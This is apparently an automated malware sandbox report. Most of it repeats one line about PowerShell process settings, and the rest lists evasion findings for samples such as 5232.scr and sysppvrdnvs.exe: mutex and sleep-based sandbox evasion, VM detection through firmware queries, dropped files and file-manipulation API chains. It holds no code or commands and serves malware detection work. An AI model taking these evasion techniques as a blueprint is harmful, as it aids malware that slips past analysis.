                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\dwm.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\dwm.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                                Malware Analysis System Evasion

                                barindex
                                Contains functionality to detect sleep reduction / modifications
                                Source: C:\Users\user\AppData\Local\Temp\5232.scrCode function: 3_2_0040D7703_2_0040D770
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 4_2_0040D7704_2_0040D770
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 17_2_0040D77017_2_0040D770
                                Found evasive API chain (may stop execution after checking mutex)
                                Source: C:\Users\user\AppData\Local\Temp\5232.scrEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_3-4456
                                Source: C:\Users\user\AppData\Local\Temp\5232.scrEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_3-4456
                                Source: C:\Windows\sysppvrdnvs.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_17-4456
                                Source: C:\Windows\sysppvrdnvs.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_17-4456
                                Query firmware table information (likely to detect VMs)
                                Source: C:\Windows\System32\dwm.exeSystem information queried: FirmwareTableInformation
                                Source: C:\Users\user\AppData\Local\Temp\513318274.exeMemory allocated: 1380000 memory reserve | memory write watchJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\513318274.exeMemory allocated: 1BEB0000 memory reserve | memory write watchJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeThread delayed: delay time: 900000Jump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\513318274.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\sysppvrdnvs.exeWindow / User API: threadDelayed 4015Jump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeWindow / User API: threadDelayed 1460Jump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5786Jump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4009Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6033
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3844
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7885
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1699
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7908
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 435
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8984
                                Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Google\Libs\WR64.sysJump to dropped file
                                Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\5232.scrEvaded block: after key decisiongraph_3-4472
                                Source: C:\Users\user\AppData\Local\Temp\5232.scrEvaded block: after key decisiongraph_3-4458
                                Source: C:\Users\user\AppData\Local\Temp\5232.scrEvaded block: after key decisiongraph_3-4540
                                Source: C:\Windows\sysppvrdnvs.exeEvaded block: after key decisiongraph_17-4456
                                Source: C:\Users\user\AppData\Local\Temp\5232.scrEvasive API call chain: RegQueryValue,DecisionNodes,Sleepgraph_3-5404
                                Source: C:\Users\user\AppData\Local\Temp\5232.scrEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_3-4500
                                Source: C:\Windows\sysppvrdnvs.exeEvasive API call chain: RegQueryValue,DecisionNodes,Sleepgraph_4-5870
                                Source: C:\Users\user\AppData\Local\Temp\2573513776.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_25-220
                                Source: C:\Windows\sysppvrdnvs.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_4-4481
                                Source: C:\Users\user\AppData\Local\Temp\5232.scrAPI coverage: 3.8 %
                                Source: C:\Windows\sysppvrdnvs.exeAPI coverage: 0.9 %
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 17_2_0040D77017_2_0040D770
                                Source: C:\Users\user\AppData\Local\Temp\5232.scrCode function: 3_2_0040D7703_2_0040D770
                                Source: C:\Windows\sysppvrdnvs.exe TID: 1080Thread sleep time: -40000s >= -30000sJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exe TID: 4064Thread sleep count: 4015 > 30Jump to behavior
                                Source: C:\Windows\sysppvrdnvs.exe TID: 4064Thread sleep time: -8030000s >= -30000sJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exe TID: 1080Thread sleep count: 1460 > 30Jump to behavior
                                Source: C:\Windows\sysppvrdnvs.exe TID: 6000Thread sleep count: 231 > 30Jump to behavior
                                Source: C:\Windows\sysppvrdnvs.exe TID: 4840Thread sleep time: -64810s >= -30000sJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exe TID: 4840Thread sleep time: -900000s >= -30000sJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exe TID: 4064Thread sleep count: 200 > 30Jump to behavior
                                Source: C:\Windows\sysppvrdnvs.exe TID: 4064Thread sleep time: -400000s >= -30000sJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5548Thread sleep count: 5786 > 30Jump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5996Thread sleep count: 4009 > 30Jump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3148Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\513318274.exe TID: 5268Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5520Thread sleep count: 6033 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5520Thread sleep count: 3844 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2212Thread sleep time: -4611686018427385s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7096Thread sleep count: 7885 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5324Thread sleep time: -5534023222112862s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7096Thread sleep count: 1699 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4620Thread sleep count: 7908 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5748Thread sleep time: -7378697629483816s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4620Thread sleep count: 435 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1888Thread sleep count: 8984 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6592Thread sleep time: -5534023222112862s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6104Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Users\user\AppData\Local\Temp\5232.scrCode function: 3_2_004068E0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,3_2_004068E0
                                Source: C:\Users\user\AppData\Local\Temp\5232.scrCode function: 3_2_004067A0 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,3_2_004067A0
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 4_2_004068E0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,4_2_004068E0
